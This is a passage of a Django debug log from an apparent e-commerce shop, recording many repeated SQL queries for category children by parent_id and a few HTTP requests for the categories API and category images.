140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 14:08:33,334 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 14:08:33,338 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 14:08:33,340 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 14:08:33,343 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 14:08:33,345 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 14:08:33,349 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 14:08:33,351 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 14:08:33,354 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 14:08:33,356 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 14:08:33,358 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 14:08:33,362 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 14:08:33,364 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 14:08:33,367 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 14:08:33,369 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 14:08:33,371 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 14:08:33,375 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 14:08:33,377 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 14:08:33,380 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 14:08:33,382 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 14:08:33,385 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 14:08:33,388 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 14:08:33,391 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 14:08:33,394 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 14:08:33,396 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 14:08:33,399 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 14:08:33,401 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 14:08:33] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 14:08:34] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [16/Dec/2019 14:08:34] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-16 14:08:39,160 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 14:08:39,167 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 14:08:39,171 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 14:08:39,173 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 14:08:39,177 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 14:08:39,179 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 14:08:39,182 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 14:08:39,184 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 14:08:39,186 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 14:08:39,190 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 14:08:39,192 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 14:08:39,194 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 14:08:39,198 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 14:08:39,201 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 14:08:39,204 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 14:08:39,207 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 14:08:39,209 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 14:08:39,211 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 14:08:39,214 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 14:08:39,220 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 14:08:39,223 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 14:08:39,226 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 14:08:39,228 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 14:08:39,230 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 14:08:39,232 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 14:08:39,236 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 14:08:39,238 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 14:08:39,240 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 14:08:39,242 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 14:08:39,245 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 14:08:39,248 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 14:08:39,250 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 14:08:39,253 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 14:08:39,255 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 14:08:39,257 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 14:08:39,262 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 14:08:39,265 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 14:08:39,268 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 14:08:39,271 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 14:08:39,274 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 14:08:39,276 utils 20136 